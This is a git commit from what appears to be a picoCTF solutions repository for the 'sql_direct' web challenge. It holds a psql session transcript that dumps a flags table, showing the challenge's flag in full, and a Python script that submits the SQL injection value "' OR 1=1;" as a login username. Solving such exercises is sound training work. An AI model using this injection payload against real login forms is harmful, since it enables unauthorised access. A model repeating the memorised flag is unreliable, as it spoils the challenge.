web/sql_direct

2024-09-05 18:51:15 +02:00 · 2024-09-05 18:51:15 +02:00 · aecaf4b417
parent 7168eff437
commit aecaf4b417
2 changed files with 48 additions and 0 deletions
--- a/web/sql_direct/output.txt
+++ b/web/sql_direct/output.txt
@ -0,0 +1,23 @@
+$ psql -h saturn.picoctf.net -p 56842 -U postgres pico
+Password for user postgres:
+psql (14.13, server 15.2 (Debian 15.2-1.pgdg110+1))
+WARNING: psql major version 14, server major version 15.
+         Some psql features might not work.
+Type "help" for help.
+
+pico=# \d
+         List of relations
+ Schema | Name  | Type  |  Owner
+--------+-------+-------+----------
+ public | flags | table | postgres
+(1 row)
+
+pico=# SELECT * FROM flags;
+ id | firstname | lastname  |                address
+----+-----------+-----------+----------------------------------------
+  1 | Luke      | Skywalker | picoCTF{L3arN_S0m3_5qL_t0d4Y_21c94904}
+  2 | Leia      | Organa    | Alderaan
+  3 | Han       | Solo      | Corellia
+(3 rows)
+
+pico=# \q
--- a/web/sql_direct/solve.py
+++ b/web/sql_direct/solve.py
@ -0,0 +1,25 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.requests
+
+import requests
+# from bs4 import BeautifulSoup
+
+BASE_URL = "http://saturn.picoctf.net:52814/"
+
+def main():
+    s = requests.Session()
+
+    res = s.post(
+        BASE_URL + "login.php",
+        data = {
+            'username': "' OR 1=1;",
+            'password': 'asdf',
+            'submit': 'Login',
+        },
+    )
+
+    print(res)
+    print(res.text)
+
+if __name__ == "__main__":
+    main()